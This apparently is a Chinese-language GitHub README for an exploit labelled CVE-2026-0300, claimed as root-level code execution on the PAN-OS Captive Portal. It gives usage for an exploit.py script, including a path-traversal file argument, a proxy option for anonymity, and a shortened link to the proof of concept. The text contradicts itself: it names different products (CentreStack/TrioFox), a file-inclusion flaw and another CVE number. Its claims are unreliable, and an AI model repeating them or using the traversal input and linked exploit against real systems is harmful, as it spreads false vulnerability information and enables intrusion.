ByteWraith1/CVE-2026-0300

# CVE-2026-0300 ### 概述 CVE-2026-0300 是一个严重的缓冲区溢出漏洞，影响 Palo Alto Networks PAN-OS 软件中的 User-ID™ Authentication Portal（也称为 Captive Portal）。 ### 环境要求 - Python 3.8+ - 库：requests, argparse（通过 `pip install -r requirements.txt` 安装） ### 使用说明 - 安装依赖项：`pip install -r requirements.txt` - 运行漏洞利用程序：`python exploit.py --target --file "/path/to/Web.config"` 选项： - `--target`：存在漏洞的 CentreStack/TrioFox 实例的 URL。 - `--file`：要包含的文件的相对路径（例如，用于测试的 "../../../../Windows/system.ini"）。 - `--proxy`：可选的 HTTP 代理，用于匿名化。 ### 工作原理 该门户提供身份验证服务，允许用户访问网络资源。该漏洞允许未经身份验证的攻击者向该服务发送特制的数据包，从而在 PA-Series 和 VM-Series 防火墙上以 root 权限执行任意代码。一旦被利用，可能导致对受影响防火墙设备的完全控制，直接破坏组织网络基础设施的安全管理。依赖这些防火墙进行安全运营的组织，如果未对该漏洞进行充分的缓解，将面临极高的风险。 ### 道德使用警告 - 此脚本是 CVE-2025-11371 的概念验证，仅供教育和授权安全测试目的使用。 - **未经系统所有者明确许可，请勿在系统上使用此脚本。** - 滥用可能违反法律，包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。 - 在测试任何系统之前，请务必获得书面授权。 ### PoC 漏洞利用 - [链接](https://tinyurl.com/yjpk44ps)

标签：Captive Portal, CISA项目, CVE-2026-0300, Go语言工具, Palo Alto Networks, PAN-OS, PoC, Python, RCE, Root权限, User-ID Authentication Portal, 企业安全, 攻击脚本, 数据展示, 无后门, 暴力破解, 未授权攻击, 系统提权, 红队, 缓冲区溢出, 编程工具, 网络安全, 网络资产管理, 远程代码执行, 防火墙, 隐私保护